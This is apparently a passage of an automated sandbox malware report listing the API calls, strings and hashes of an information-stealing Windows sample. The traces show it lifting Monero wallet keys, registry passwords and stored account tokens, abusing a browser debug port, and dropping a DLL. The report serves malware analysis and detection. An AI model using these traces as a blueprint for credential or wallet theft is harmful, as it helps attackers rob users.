                              • Part of subcall function 000D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                              • Part of subcall function 000D12A0: RegCloseKey.ADVAPI32(?), ref: 000D12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 000D134F
                            • lstrlen.KERNEL32(?), ref: 000D135C
                            • lstrcat.KERNEL32(?,.keys), ref: 000D1377
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 000D1465
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 000D14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 3c4b9fa9c004ceed5c85f996a6f449c230e082b888cfc2ac79ecbc17f9483058
                            • Instruction ID: 422fa59cf3285c0baa24084b885b7d14ab5e62cdf1951097bd66f7f7b515cb48
                            • Opcode Fuzzy Hash: 3c4b9fa9c004ceed5c85f996a6f449c230e082b888cfc2ac79ecbc17f9483058
                            • Instruction Fuzzy Hash: 825121B1E502589BCB15EB60DDA2EED737C9F55300F4045E8B60A76093EF306B89CB66
                            APIs
                            • InternetOpenA.WININET(000F0AF6,00000001,00000000,00000000,00000000), ref: 000D9A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000D9AAB
                            • InternetCloseHandle.WININET(00000000), ref: 000D9AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            APIs
                              • Part of subcall function 000D7330: memset.MSVCRT ref: 000D7374
                              • Part of subcall function 000D7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D739A
                              • Part of subcall function 000D7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D7411
                              • Part of subcall function 000D7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D746D
                              • Part of subcall function 000D7330: GetProcessHeap.KERNEL32(00000000,?), ref: 000D74B2
                              • Part of subcall function 000D7330: HeapFree.KERNEL32(00000000), ref: 000D74B9
                            • lstrcat.KERNEL32(00000000,000F192C), ref: 000D7666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D76A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 000D76BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D76EF
                            • lstrcat.KERNEL32(00000000,000F1934), ref: 000D7700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D7733
                            • lstrcat.KERNEL32(00000000,000F1938), ref: 000D774D
                            • task.LIBCPMTD ref: 000D775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            APIs
                            • memset.MSVCRT ref: 000D7374
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D7411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 000D74B2
                            • HeapFree.KERNEL32(00000000), ref: 000D74B9
                            • task.LIBCPMTD ref: 000D75B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D4E188,00000000,?,000F0E14,00000000,?,00000000), ref: 000E82C0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E82C7
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 000E82E8
                            • __aulldiv.LIBCMT ref: 000E8302
                            • __aulldiv.LIBCMT ref: 000E8310
                            • wsprintfA.USER32 ref: 000E833C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            APIs
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                            • wsprintfA.USER32 ref: 000D9E7F
                            • memset.MSVCRT ref: 000D9EED
                            • lstrcat.KERNEL32(00000000,?), ref: 000D9F03
                            • lstrcat.KERNEL32(00000000,?), ref: 000D9F17
                            • lstrcat.KERNEL32(00000000,000F12D8), ref: 000D9F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 000D9F7C
                            • memset.MSVCRT ref: 000D9F9C
                            • Sleep.KERNEL32(00001388), ref: 000DA013
                              • Part of subcall function 000E99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E99C5
                              • Part of subcall function 000E99A0: Process32First.KERNEL32(000DA056,00000128), ref: 000E99D9
                              • Part of subcall function 000E99A0: Process32Next.KERNEL32(000DA056,00000128), ref: 000E99F2
                              • Part of subcall function 000E99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E9A4E
                              • Part of subcall function 000E99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9A6C
                              • Part of subcall function 000E99A0: CloseHandle.KERNEL32(00000000), ref: 000E9A79
                              • Part of subcall function 000E99A0: CloseHandle.KERNEL32(000DA056), ref: 000E9A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 3242155833-2746444292
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000D4889
                              • Part of subcall function 000D4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 000D4899
                            • InternetOpenA.WININET(000F0DFB,00000001,00000000,00000000,00000000), ref: 000D615F
                            • StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000D61DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000D6203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 000D622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 000D6299
                            • InternetCloseHandle.WININET(?), ref: 000D62A3
                            • InternetCloseHandle.WININET(00000000), ref: 000D62B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 0015024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 0015035B
                            • CatchIt.LIBVCRUNTIME ref: 001503AC
                            • CallUnexpected.LIBVCRUNTIME ref: 001504C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • lstrlen.KERNEL32(00000000), ref: 000DBC6F
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 000DBC9D
                            • lstrlen.KERNEL32(00000000), ref: 000DBD75
                            • lstrlen.KERNEL32(00000000), ref: 000DBD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: b7862603e3b3b4cd9dc014ea8adb440cd10510cadf3bc0df4ab91ff0b7194759
                            • Instruction ID: 5973e27e9b48d8d7217b3f0c58be0d25615d58b3d52d05fd131bb0f4f25c975e
                            • Opcode Fuzzy Hash: b7862603e3b3b4cd9dc014ea8adb440cd10510cadf3bc0df4ab91ff0b7194759
                            • Instruction Fuzzy Hash: 6BF0E230E0C208EFD3409FE0FC4879CBBB8EB06707F0041A6F609A6191C6715A40CF52
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,000E08DC,C:\ProgramData\chrome.dll), ref: 000E9871
                              • Part of subcall function 000DA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000DA098
                            • StrCmpCA.SHLWAPI(00000000,00D49178), ref: 000E0922
                            • StrCmpCA.SHLWAPI(00000000,00D49188), ref: 000E0B79
                            • StrCmpCA.SHLWAPI(00000000,00D491B8), ref: 000E0A0C
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 000E0C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 000E08CD
                            • C:\ProgramData\chrome.dll, xrefs: 000E0C30
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 54b788e7897f9b516d5aac76cf15b6a0255627d2c37aa180e07c80f089e1e9b1
                            • Instruction ID: 355f83d622557d1513900f4ecbe4c395e2e9661ad0a9b925a312f7c3383636f2
                            • Opcode Fuzzy Hash: 54b788e7897f9b516d5aac76cf15b6a0255627d2c37aa180e07c80f089e1e9b1
                            • Instruction Fuzzy Hash: AEA17871B002489FCB28EF65D996EED777AEF95300F11816DE40A5F352DB30AA05CB92
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 0014FA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0014FA27
                            • _ValidateLocalCookies.LIBCMT ref: 0014FAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0014FADB
                            • _ValidateLocalCookies.LIBCMT ref: 0014FB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 04a9b08f87e2c7f18051f5dd8b5de20cf723101e6a52d65197c4a11c8bba16df
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: 6541A534900219EFCF10DF68C885A9E7BB5FF49314F248169ED19AB3A1D731D906CB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000D501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D5021
                            • InternetOpenA.WININET(000F0DE3,00000000,00000000,00000000,00000000), ref: 000D503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000D5061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 000D5091
                            • InternetCloseHandle.WININET(?), ref: 000D5109
                            • InternetCloseHandle.WININET(?), ref: 000D5116
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 974168c7be0268d03118be9465b626d0589a5aaf03d9b98edbd30d432a0b7c6f
                            • Instruction ID: ac57a5c96f4b6a484b784d8c45ffbcfad0d8f8ccdf8e88518bbd9867c80b80db
                            • Opcode Fuzzy Hash: 974168c7be0268d03118be9465b626d0589a5aaf03d9b98edbd30d432a0b7c6f
                            • Instruction Fuzzy Hash: EE31EAB4A44218ABDB20CF54DC85BDDB7B8EB48305F1085D9FB09A7281D7706EC58F99
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000E85B6
                            • wsprintfA.USER32 ref: 000E85E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 000E860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8629
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E200,00000000,000F003F,?,00000400), ref: 000E867C
                            • lstrlen.KERNEL32(?), ref: 000E8691
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000F0B3C), ref: 000E8729
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E8798
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E87AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: f0e669987734db7023fdcdb4aeb7f785a800106f8bac0722106240487a3e1f2a
                            • Instruction ID: 3b68d1cca83fde93eb15b24936b23de5ccec0bb2e190e8bd39f71fedda32861f
                            • Opcode Fuzzy Hash: f0e669987734db7023fdcdb4aeb7f785a800106f8bac0722106240487a3e1f2a
                            • Instruction Fuzzy Hash: D621E471A1421CAFDB64DB54DC85FE9B3B8FB48700F10C5D8E649A6180DF71AA85CFA4
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E99C5
                            • Process32First.KERNEL32(000DA056,00000128), ref: 000E99D9
                            • Process32Next.KERNEL32(000DA056,00000128), ref: 000E99F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E9A4E
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E9A6C
                            • CloseHandle.KERNEL32(00000000), ref: 000E9A79
                            • CloseHandle.KERNEL32(000DA056), ref: 000E9A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: f5c4ee9206808cf4af181c3147c6a935c90ba061c4be4dd9b8b6f591dd9c9cc1
                            • Instruction ID: 63373ce689956a672836bb8cbe8ce5d5dc1abf11702f42bf052b7a64f317b4b0
                            • Opcode Fuzzy Hash: f5c4ee9206808cf4af181c3147c6a935c90ba061c4be4dd9b8b6f591dd9c9cc1
                            • Instruction Fuzzy Hash: CC211871900218AFDB65DFA2CC88BEDB7B9BF49300F0441D8E509A7290C7749E84CF91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E7834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E783B
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C208,00000000,00020119,00000000), ref: 000E786D
                            • RegQueryValueExA.ADVAPI32(00000000,00D4E380,00000000,00000000,?,000000FF), ref: 000E788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E7898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
